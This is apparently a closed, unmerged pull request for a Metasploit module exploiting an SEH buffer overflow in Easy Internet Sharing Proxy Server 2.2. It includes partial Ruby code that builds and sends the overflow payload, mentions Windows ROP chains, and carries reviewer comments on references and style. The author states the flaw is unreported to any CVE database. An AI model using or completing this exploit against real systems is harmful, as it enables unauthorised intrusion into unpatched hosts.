### PR TITLE
Easy Internet Sharing Proxy Server 2.2 SEH Buffer Overflow

### PR DESCRIPTION
**Pull request by turbo420**
This module exploits a SEH Buffer overflow in the Easy Internet Sharing Proxy Socks Server 2.2

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] use exploit/windows/proxy/easy_internet_sharing_proxy_rop
- [ ] set Rhost
- [ ] set Target 
- [ ] exploit

### CODE REVIEW

File: modules/exploits/windows/proxy/easy_internet_sharing_proxy_rop.rb [hunk 1]
```diff
@@ -0,0 +1,272 @@
...
+      },
+      'Platform'       => 'win',
+      'Author'         =>
+        [
+          'tracyturben[at]gmail.com'
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ %w{URL http://www.sharing-file.com/products.htm}]
```
Comment (h00die) [inline modules/exploits/windows/proxy/easy_internet_sharing_proxy_rop.rb]: 'URL', 'http://www.sharing-file.com/products.htm'

Comment (h00die) [inline modules/exploits/windows/proxy/easy_internet_sharing_proxy_rop.rb]: Are there any other references, CVE, EDB?
Is the vendor aware of this vuln, do they have any release notes?

File: modules/exploits/windows/proxy/easy_internet_sharing_proxy_rop.rb [hunk 2]
```diff
@@ -0,0 +1,272 @@
...
+   sploit << rand_text_alpha(target['Offset'] - payload.encoded.length)
+   sploit << generate_seh_record(target.ret)
+   print_good('Sending exploit...')
+   sock.put(sploit)
+   print_good('Exploit Sent...')
+   handler
+   disconnect
+end
+
+   if target.name =~ /7 32bit/
```
Comment (h00die) [inline modules/exploits/windows/proxy/easy_internet_sharing_proxy_rop.rb]: you have a bunch of `if` statements, why not combine them into an `if` `elsif`?  Should help combine some of the print and other statements

File: modules/exploits/windows/proxy/easy_internet_sharing_proxy_rop.rb [hunk 3]
```diff
@@ -0,0 +1,272 @@
...
+    sock.put(sploit)
+    print_good('Exploit Sent...')
+    handler
+    disconnect
+
+end
+
+   if target.name =~ /8.1 32bit/
+
+    print_good('Building Windows 8 Rop Chain')
```
Comment (h00die) [inline modules/exploits/windows/proxy/easy_internet_sharing_proxy_rop.rb]: im sure if travis didn't complain, your indentation is off.  2 space.

File: modules/exploits/windows/proxy/easy_internet_sharing_proxy_rop.rb (hunk 1 above)
Comment (turbo420) [inline modules/exploits/windows/proxy/easy_internet_sharing_proxy_rop.rb]: lol ok

Comment (turbo420) [inline modules/exploits/windows/proxy/easy_internet_sharing_proxy_rop.rb]: the vendor don't respond to emails tried two times in the last 90 days and have tried with other exploits too. there is no cve or edb it has never been exploit before now.

File: modules/exploits/windows/proxy/easy_internet_sharing_proxy_rop.rb (hunk 3 above)
Comment (turbo420) [inline modules/exploits/windows/proxy/easy_internet_sharing_proxy_rop.rb]: you seem to do a lot of complaining

**Pull request closed without merging**